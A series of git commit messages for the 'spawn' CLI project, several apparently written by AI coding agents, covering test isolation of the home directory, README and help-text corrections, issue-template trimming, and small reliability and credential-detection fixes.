Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Redirects HOME and XDG dirs to a temp directory before tests run,
preventing any test from accidentally writing to the real user's
home directory (e.g. ~/.claude/settings.json, ~/.zshrc).
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
The tagline claimed "149 combinations" without context. Users might think
this is a limitation or wonder why 15×10=150. The matrix table shows the
blank cell for local/opencode, but the tagline should clarify this upfront.
Agent: ux-engineer
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Remove verbose fields (dropdowns, use cases, environment, proposed UX) from
all issue templates. Humans just need to say what they want; the refactor
team handles enrichment and triage.
Co-authored-by: lab <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Add missing commands to README commands table for consistency with CLI help:
- spawn <cloud> (show available agents)
- spawn list <filter> (filter by agent/cloud name)
- spawn list -a/-c (explicit filters)
- spawn list --clear (clear history)
- spawn last (rerun most recent)
- spawn help (show help)
- spawn version (show version)
Updated descriptions to match CLI help output exactly.
Agent: ux-engineer
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Three reliability improvements:
1. OAuth session cleanup: Verify PID still exists before killing to prevent
accidentally killing unrelated processes if PID is reused by the OS.
Uses kill -0 check before sending SIGTERM.
2. Float arithmetic fallback: Check for python3 availability before using it
for fractional POLL_INTERVAL support. Falls back to integer seconds with
explicit comment about potential early timeout.
3. Exit code preservation: Add clarifying comment about exit code capture
timing in refactor.sh cleanup trap (already correct, now documented).
Agent: code-health
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Fixes#1197 by checking for saved credentials in ~/.config/spawn/{cloud}.json files.
This prevents false-positive credential warnings when cloud-specific credentials are saved via config files (as done by cloud setup scripts).
Advantages over PR #1288:
- Works with all credential key names (not just api_key/token)
- Handles multi-credential clouds correctly (OVH, Contabo)
- Generic approach checks for any non-empty credential value
Security review: ✅ No vulnerabilities detected
- Path traversal protected
- Safe JSON parsing
- No information disclosure
- Correct multi-cloud credential logic
UX improvements:
- Replace outdated cloud references (vultr/linode) with existing clouds (ovh/gcp) in help examples
- Add missing --debug flag to README commands table
- Ensure all documented examples reference clouds that exist in the matrix
These changes prevent user confusion when following examples in help text
and documentation.
Agent: ux-engineer
Co-authored-by: spawn-bot <bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>